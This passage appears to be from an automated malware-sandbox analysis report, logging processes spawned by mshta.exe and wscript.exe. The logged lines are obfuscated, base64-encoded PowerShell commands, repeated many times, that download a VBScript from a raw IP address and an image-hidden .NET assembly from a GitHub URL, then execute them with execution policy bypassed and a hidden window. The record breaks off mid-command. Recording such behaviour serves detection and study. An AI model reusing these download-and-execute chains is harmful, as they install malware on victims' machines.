IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"Jump to behavior
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"Jump to behavior
                  Suspicious powershell command line found
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZWJlc3RwcmljZXdpdGhnb29kY29va2llc21lLnRJRiIsIiRFblY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyIsMCwwKTtzVGFSVC1zTGVlUCgzKTtTVGFSVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVxzZWV0aGViZXN0cHJpY2V3aXRoZ29vZGNvb2tpZXNtLnZiUyI='+[ChAr]0X22+'))')))"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCd0ZycrJzRpbWFnZVVybCA9IE5sTGh0dCcrJ3BzOi8vJysncmF3LmdpdGh1YnVzZXJjbycrJ250ZW50LmNvbS9DcnlwdGVyc0FuZFRvb2xzT2ZpY2lhbC9aSVAvcmVmcy9oZScrJ2FkJysncy9tYWluL0QnKydldGFoTm90ZV9WLmpwZyBObEw7dGc0d2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt0ZzRpbWFnZUInKyd5dGVzID0gdGc0d2ViQ2xpZW50LkRvd25sb2EnKydkRGF0YSh0ZzRpbWFnZVVybCk7dGc0aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kJysnaW5nXTo6VVRGOC5HZXRTdHJpbmcodGc0aW1hZ2VCeXRlcyk7dGc0c3RhcnRGbGFnID0gTmxMPDxCQVNFNjRfU1RBUlQ+Pk5sJysnTDt0ZzRlbmRGbGFnID0gTmxMPDxCQVMnKydFNjRfRU5EPj5ObEw7dCcrJ2c0c3RhcnRJbmRleCA9IHRnNGltYWdlVGV4dC5JbmRleE9mKHRnNHN0YXJ0RmxhZyk7dGc0ZW5kSW5kZXggPSB0ZzRpbWFnZVQnKydleHQuSW5kZXhPZih0ZzRlbmRGbGFnKTt0ZzRzdGFydEluZGV4JysnIC1nJysnZSAwIC1hbmQgdGc0ZW5kSW5kZXggLWd0IHRnNHN0YXJ0SW5kZXg7dGc0cycrJ3RhcnRJbmRleCArPSB0ZzRzdGFydEZsYWcuTGVuZ3RoO3RnNGJhc2U2NExlbmd0aCA9IHRnNGVuZEluZGV4IC0gdGc0c3RhcnRJbmRleDt0ZzRiYXNlNjRDb21tYW5kJysnID0gdGc0aW1hZ2VUZXh0LlN1YnN0cmluZygnKyd0ZzRzdGFydEluZGV4LCB0ZzRiYXNlNjRMZW5ndGgpO3RnNGNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydCcrJ106OkYnKydyb21CYXNlNjRTdHJpbmcodGc0YmFzZTY0Q29tbWFuZCk7dGc0bG9hZGVkQXNzZW1ibCcrJ3kgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHRnNGNvbW1hbmRCeScrJ3RlJysncyk7dGc0dmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChObExWQScrJ0lObEwpO3RnNHZhaScrJ01ldGhvZCcrJy5JbnZva2UodGc0bnVsbCwgQChObCcrJ0x0eHQuRUNDRlJSLzA1NC8wNC4wMjIuMy4yOTEvLzpwdHRoTmwnKydMLCBObExkZXNhdCcrJ2l2YWRvTicrJ2xMLCBObExkZXNhdGl2YWRvTmxMLCBObExkZXNhdGl2YWRvTmxMLCBObExSZWdBc21ObEwsIE5sTGRlc2F0aXZhZG9ObEwsIE5sTGRlc2F0aXZhZG9ObEwpKTsnKS5SRVBsQWNlKCd0ZzQnLFtzVHJJbkddW2NoQXJdMzYpLlJFUGxBY2UoKFtjaEFyXTc4K1tjaEFyXTEwOCtbY2hBcl03NiksW3NUckluR11bY2hBcl0zOSkgfCAuICgoZ1YgJypNZFIqJykuTmFtZVszLDExLDJdLUpvSU4nJyk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('tg'+'4imageUrl = NlLhtt'+'ps://'+'raw.githubuserco'+'ntent.com/CryptersAndToolsOficial/ZIP/refs/he'+'ad'+'s/main/D'+'etahNote_V.jpg NlL;tg4webClient = New-Object System.Net.WebClient;tg4imageB'+'ytes = tg4webClient.Downloa'+'dData(tg4imageUrl);tg4imageText = [System.Text.Encod'+'ing]::UTF8.GetString(tg4imageBytes);tg4startFlag = NlL<<BASE64_START>>Nl'+'L;tg4endFlag = NlL<<BAS'+'E64_END>>NlL;t'+'g4startIndex = tg4imageText.IndexOf(tg4startFlag);tg4endIndex = tg4imageT'+'ext.IndexOf(tg4endFlag);tg4startIndex'+' -g'+'e 0 -and tg4endIndex -gt tg4startIndex;tg4s'+'tartIndex += tg4startFlag.Length;tg4base64Length = tg4endIndex - tg4startIndex;tg4base64Command'+' = tg4imageText.Substring('+'tg4startIndex, tg4base64Length);tg4commandBytes = [System.Convert'+']::F'+'romBase64String(tg4base64Command);tg4loadedAssembl'+'y = [System.Reflection.Assembly]::Load(tg4commandBy'+'te'+'s);tg4vaiMethod = [dnlib.IO.Home].GetMethod(NlLVA'+'INlL);tg4vai'+'Method'+'.Invoke(tg4null, @(Nl'+'Ltxt.ECCFRR/054/04.022.3.291//:ptthNl'+'L, NlLdesat'+'ivadoN'+'lL, NlLdesativadoNlL, NlLdesativadoNlL, NlLRegAsmNlL, NlLdesativadoNlL, NlLdesativadoNlL));').REPlAce('tg4',[sTrInG][chAr]36).REPlAce(([chAr]78+[chAr]108+[chAr]76),[sTrInG][chAr]39) | . ((gV '*MdR*').Name[3,11,2]-JoIN'')"
                  Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SYSTEM32\wInDoWspoWERsheLl\v1.0\pOwerSHelL.EXe" "PowErsheLl.ExE -Ex byPaSs -nop -W 1 -c DevicECrEdentiaLdEploymeNt.eXe ; IEx($(IeX('[SYStEm.tEXt.enCoDing]'+[cHaR]58+[chaR]58+'Utf8.gEtsTRiNg([sYstEM.CoNVErT]'+[cHar]58+[ChaR]0x3a+'FromBaSE64sTrIng('+[chAR]34+'JEcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVyZGVmaW5JdGlPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVybG1vTiIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBHbWZScFV0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1kWHZOLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRnQsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXh4c2lBU0hmLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeEhXU3kpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZ3VNcGJiZUdkVyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1lU1BhY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9NenpHY015TiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuNDAvNDUwL3NlZXRoZW